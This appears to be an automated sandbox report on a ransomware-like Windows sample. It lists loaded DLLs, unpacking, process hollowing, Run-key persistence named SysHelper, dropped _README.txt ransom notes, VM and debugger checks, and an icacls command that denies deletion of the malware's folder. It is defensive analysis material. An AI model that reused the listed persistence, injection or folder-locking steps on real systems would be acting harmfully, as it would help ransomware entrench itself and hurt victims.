          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: mU2p71KMss.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: mU2p71KMss.exe, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: CC:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: mU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 1.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 5.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 7.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 10.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 13.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 1.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 5.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 7.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 10.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 13.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,1_2_00412220
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00406805 push ecx; ret 0_2_00406818
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0438B0AF push ecx; retf 0_2_0438B0B2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DF8F05 push ecx; ret 0_2_05DF8F18
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00428565 push ecx; ret 1_2_00428578
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_044AA0AF push ecx; retf 4_2_044AA0B2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E08F05 push ecx; ret 4_2_05E08F18
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00428565 push ecx; ret 5_2_00428578
          Source: C:\Users\user\Desktop\mU2p71KMss.exeFile created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\Users\user\Desktop\mU2p71KMss.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\Users\user\Desktop\mU2p71KMss.exe.bgzq (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\_README.txtJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\Users\user\_README.txtJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00405653 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00405653
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0438971C rdtsc 0_2_0438971C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,1_2_0040E670
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,5_2_0040E670
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeDropped PE file which has not been started: C:\Users\user\Desktop\mU2p71KMss.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeDropped PE file which has not been started: C:\Users\user\Desktop\mU2p71KMss.exe.bgzq (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\mU2p71KMss.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-45021
          Source: C:\Users\user\Desktop\mU2p71KMss.exeAPI coverage: 4.6 %
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,1_2_0040FB98
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,5_2_0040FB98
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhKw%SystemRoot%\system32\mswsock.dll
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: mU2p71KMss.exe, 00000001.00000003.2003059893.0000000000915000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2009528237.0000000000915000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000755000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000746000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|R~
          Source: C:\Users\user\Desktop\mU2p71KMss.exeAPI call chain: ExitProcess graph end nodegraph_1-45023
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0438971C rdtsc 0_2_0438971C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0040A3A4 IsDebuggerPresent,0_2_0040A3A4
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0042A57A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,1_2_00412220
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_043880A3 push dword ptr fs:[00000030h]0_2_043880A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD0042 push dword ptr fs:[00000030h]0_2_05DD0042
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_044A70A3 push dword ptr fs:[00000030h]4_2_044A70A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE0042 push dword ptr fs:[00000030h]4_2_05DE0042
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00405A52 GetProcessHeap,0_2_00405A52
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0040A32F SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A32F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004329EC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004329BB SetUnhandledExceptionFilter,1_2_004329BB
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004329EC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004329BB SetUnhandledExceptionFilter,5_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_05DD0110
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\mU2p71KMss.exeMemory written: C:\Users\user\Desktop\mU2p71KMss.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeMemory written: C:\Users\user\Desktop\mU2p71KMss.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMemory written: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMemory written: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMemory written: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"Jump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStartJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DF80F6 cpuid 0_2_05DF80F6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_05E03F87
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_05E049EA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_05E0394D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_05DFC8B7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_05E10AB6
